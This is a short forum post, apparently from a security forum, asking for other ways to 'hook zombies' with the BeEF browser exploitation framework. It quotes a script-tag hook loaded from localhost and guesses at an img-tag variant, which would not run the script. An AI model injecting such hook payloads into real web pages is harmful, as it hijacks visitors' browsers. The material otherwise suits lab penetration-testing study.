Sorry to hijack this thread but I figured I could ask my question here.
I remember seeing somewhere other methods to use to hook zombies. other than the following JavaScript code.
Code:
<script language='Javascript'
src='http://localhost/beef/hook/beefmagic.js.php'></script>
I've spent a little time Googling with out success. I think I remember seeing a way to perform the same command somehow called from an image tag to connect. something like the following
Code:
<img src="http://localhost/beef/hook/beefmagic.js.php"/>
Thank you.